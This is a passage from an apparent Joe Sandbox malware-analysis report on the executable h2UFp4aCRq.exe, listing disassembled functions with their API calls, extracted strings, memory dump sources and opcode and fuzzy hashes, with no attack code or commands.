                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 1452528299-0
                                                                                • Opcode ID: 78dc37e4e071e228ed3534b9df95560ad3d484c652abfb19ccc8d1b5f8958ebb
                                                                                • Instruction ID: 023b193cfb55f4bd442ed1a6e97222f438c108c8cbf55b02b7ef048b01758370
                                                                                • Opcode Fuzzy Hash: 78dc37e4e071e228ed3534b9df95560ad3d484c652abfb19ccc8d1b5f8958ebb
                                                                                • Instruction Fuzzy Hash: EE51817AB14A8695EB009B65D4482EC2362FB85FDCF484231DA5DA7B97EF2CE944C340
                                                                                Function 00007FF655949D90 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
                                                                                • String ID:
                                                                                • API String ID: 1077098981-0
                                                                                • Opcode ID: ca5d27243be9ec8130d03a2fe366c549bde872ce788a203b2958cc7020f45f59
                                                                                • Instruction ID: f7af4c1569f161eacea2ec250fc831e7e00f14879f2c73d8561d4b60adae8b1b
                                                                                • Opcode Fuzzy Hash: ca5d27243be9ec8130d03a2fe366c549bde872ce788a203b2958cc7020f45f59
                                                                                • Instruction Fuzzy Hash: 1B518136A18B8286E7408F61E4583AE77A4FB85F88F541035EA8DA7A55DF3DDC44CB40
                                                                                Function 00007FF65595DB5C Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                • String ID:
                                                                                • API String ID: 4141327611-0
                                                                                • Opcode ID: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
                                                                                • Instruction ID: e26020f65d4c72805d9aad345836b9d6338dda1230b0d5b2e39794602da3a0f2
                                                                                • Opcode Fuzzy Hash: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
                                                                                • Instruction Fuzzy Hash: 4841813AA087C246FB659B10D0483796291EFC0F9AF1C8131DA5DE6A97DF6CEE918700
                                                                                Function 00007FF655933980 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: FileMove_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 3823481717-0
                                                                                • Opcode ID: 9a9a58264430c11791c0c606b390f78d08ba3037c1fa37d6a31b7cedc8df9908
                                                                                • Instruction ID: 23c861c467e614443b1de798ffb245aa7797fdb6f6faa5680e1bf434250b4c23
                                                                                • Opcode Fuzzy Hash: 9a9a58264430c11791c0c606b390f78d08ba3037c1fa37d6a31b7cedc8df9908
                                                                                • Instruction Fuzzy Hash: 3841BE66F14B91C4FB00CBB9D8881AC23B1BF44FA8B195231DE5DA6A9ADF3CD845C240
                                                                                Function 00007FF655960B78 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF65595C45B), ref: 00007FF655960B91
                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF65595C45B), ref: 00007FF655960BF3
                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF65595C45B), ref: 00007FF655960C2D
                                                                                • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF65595C45B), ref: 00007FF655960C57
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                • String ID:
                                                                                • API String ID: 1557788787-0
                                                                                • Opcode ID: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
                                                                                • Instruction ID: 4f12e1133e886e0d1eb26e495f8dfeba24b77a9a92538a916c60b0f60424b5be
                                                                                • Opcode Fuzzy Hash: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
                                                                                • Instruction Fuzzy Hash: 32218435F18BD185EA249F11A49402976E4FB94FD4B0C4134DE8EB3B96DF3CE8568340
                                                                                Function 00007FF65595D440 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$abort
                                                                                • String ID:
                                                                                • API String ID: 1447195878-0
                                                                                • Opcode ID: df247b5a3948333368795c339682862bf84e23f7c025c70b8dad3e7beb060077
                                                                                • Instruction ID: 131a1ccb404cfd585669905b1e2b7bdbfa6bd40b69cfcdb80361181c0744f6cf
                                                                                • Opcode Fuzzy Hash: df247b5a3948333368795c339682862bf84e23f7c025c70b8dad3e7beb060077
                                                                                • Instruction Fuzzy Hash: 1B018028B097C642FA59AB71A65D17811925F84FDAF0C1438D91EE67D7EF2CBD248240
                                                                                Function 00007FF655948590 Relevance: 6.0, APIs: 4, Instructions: 21COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: CapsDevice$Release
                                                                                • String ID:
                                                                                • API String ID: 1035833867-0
                                                                                • Opcode ID: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
                                                                                • Instruction ID: 4b66c8a3ed075f469289ddc521626b51460d424d0e1ab132a6a2d3d57084ad6b
                                                                                • Opcode Fuzzy Hash: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
                                                                                • Instruction Fuzzy Hash: 3EE0ED68E0968282FF085B71686D1362190AF48F49F4C843DD81EE6352DF3DE8858611
                                                                                Function 00007FF65592E34C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 176COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID: DXGIDebug.dll
                                                                                • API String ID: 3668304517-540382549
                                                                                • Opcode ID: f6f652c4426adce50dbf435433714115e5776bfcc552121c901ae94cf08821c0
                                                                                • Instruction ID: ee017adab2a26b5693b1502439cfe1816c79cfd793bc33a5546ec499de32748d
                                                                                • Opcode Fuzzy Hash: f6f652c4426adce50dbf435433714115e5776bfcc552121c901ae94cf08821c0
                                                                                • Instruction Fuzzy Hash: 6A71AE76A14B8182EB14CB65E8483ADB3A4FB54BD8F484235DBAC57B96DF7CD861C300
                                                                                Function 00007FF65595E1F4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: e+000$gfff
                                                                                • API String ID: 3215553584-3030954782
                                                                                • Opcode ID: ffbcb58cc87a1110f60409a8afde5d08377aab6ce8cf060c3284a5669936e3c2
                                                                                • Instruction ID: 734974bb7d6d688c24714188ca3fabff044561427c50d5f1ad463b3a9731c0d1
                                                                                • Opcode Fuzzy Hash: ffbcb58cc87a1110f60409a8afde5d08377aab6ce8cf060c3284a5669936e3c2
                                                                                • Instruction Fuzzy Hash: 1551236AB187C146E7258B3598443696B91EB80F94F4C8275CB9CD7BDACF2DE854C700
                                                                                Function 00007FF655939408 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$swprintf
                                                                                • String ID: SIZE
                                                                                • API String ID: 449872665-3243624926
                                                                                • Opcode ID: 95182320ee7b3a48c420107a4992996f84afbbac13f0d5532198c1d22c251322
                                                                                • Instruction ID: 7f71cb7f02cd99dede0840e7022b4f7b267411043bc2d27b961805d9a09da00d
                                                                                • Opcode Fuzzy Hash: 95182320ee7b3a48c420107a4992996f84afbbac13f0d5532198c1d22c251322
                                                                                • Instruction Fuzzy Hash: 4741B466A186C386EE10DF14E4493BD6350EF85B98F594231EA9D966D7EF3CD980C700
                                                                                Function 00007FF65595C2C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                • String ID: C:\Users\user\Desktop\h2UFp4aCRq.exe
                                                                                • API String ID: 3307058713-3792028742
                                                                                • Opcode ID: 2b307fc7043d57580c2760bc14d10e66149d3294dbd6a1f00798eb6953a6f573
                                                                                • Instruction ID: 07fae52ec9bbef0b355e0f4aaa056960c7871703da4b60e0fe462fa124620771
                                                                                • Opcode Fuzzy Hash: 2b307fc7043d57580c2760bc14d10e66149d3294dbd6a1f00798eb6953a6f573
                                                                                • Instruction Fuzzy Hash: 3641823AA09B9686EB159F21A8441BC7794EF84FD8B484031EA4EE7746DF3DE851C380
                                                                                Function 00007FF655949B40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: Item$Text$Dialog
                                                                                • String ID: ASKNEXTVOL
                                                                                • API String ID: 2638039312-3402441367
                                                                                • Opcode ID: dcd268aa3fbf12e0d7b9e6ebcb2085d3825137d47b75af17d5842d9a86e293fc
                                                                                • Instruction ID: 889f32d87472f02ed05f26c092d847bb7e21b016b26d2660904a9dbf12104ac1
                                                                                • Opcode Fuzzy Hash: dcd268aa3fbf12e0d7b9e6ebcb2085d3825137d47b75af17d5842d9a86e293fc
                                                                                • Instruction Fuzzy Hash: 2841822AA0C6C281FA109B11E9582B963A1BF85FC9F1C4035DE9DA7797DF3DEC518341
                                                                                Function 00007FF655939638 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide_snwprintf
                                                                                • String ID: $%s$@%s
                                                                                • API String ID: 2650857296-834177443
                                                                                • Opcode ID: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
                                                                                • Instruction ID: 35474566a6823b6f65f68e9dae0a3f8bc940510f5318fdf66b08961dc6b22fa8
                                                                                • Opcode Fuzzy Hash: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
                                                                                • Instruction Fuzzy Hash: 4831C37AB19A8B86EA108F65D4483A927A0FB44FCCF490032DE0D67796DF3CE905C740
                                                                                Function 00007FF655950204 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: DialogParamVisibleWindow
                                                                                • String ID: GETPASSWORD1
                                                                                • API String ID: 3157717868-3292211884
                                                                                • Opcode ID: 3689008c5ae976a1f3a242e5b1eb30ef9737a63c20829ff4d7ba5964f065d3d0
                                                                                • Instruction ID: aef18f7adda94019ef782c4e5b784f855210c3190c44bdba5b8c66e47d6d8a36
                                                                                • Opcode Fuzzy Hash: 3689008c5ae976a1f3a242e5b1eb30ef9737a63c20829ff4d7ba5964f065d3d0
                                                                                • Instruction Fuzzy Hash: EE314D2DA0C7C285EB008B22A8580B92B61AF45F88F8C4035DA9DB7767DF2DFC54C351
                                                                                Function 00007FF65595EB04 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: FileHandleType
                                                                                • String ID: @
                                                                                • API String ID: 3000768030-2766056989
                                                                                • Opcode ID: 01c4e23626c5bd34e0d32a71787dfe5976e9b76bf070a7e2fa99837352baeece
                                                                                • Instruction ID: a4d6e8fd14379eb1c80577b84474b1c2a72d74a8bd3c3183be0c5e3eb471c8f9
                                                                                • Opcode Fuzzy Hash: 01c4e23626c5bd34e0d32a71787dfe5976e9b76bf070a7e2fa99837352baeece
                                                                                • Instruction Fuzzy Hash: B621A126E086C241EB708B2694981382659EF45B7AF2C0379D66FA67D5CF3EDC95C201
                                                                                Function 00007FF655954078 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF655951D3E), ref: 00007FF6559540BC
                                                                                • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF655951D3E), ref: 00007FF655954102
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                • String ID: csm
                                                                                • API String ID: 2573137834-1018135373
                                                                                • Opcode ID: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
                                                                                • Instruction ID: 89a510b23fd96e3fabb6a4ef45c85fbfcef4ed13f8e440a7661f26d9c7c232c0
                                                                                • Opcode Fuzzy Hash: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
                                                                                • Instruction Fuzzy Hash: 55116D36608B8182EB608B25E44426977E0FB88F88F2C4230DF8C57755DF3CC965C700
                                                                                Function 00007FF65593EA5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16synchronizationCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF65593E95F,?,?,?,00007FF65593463A,?,?,?), ref: 00007FF65593EA63
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF65593E95F,?,?,?,00007FF65593463A,?,?,?), ref: 00007FF65593EA6E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
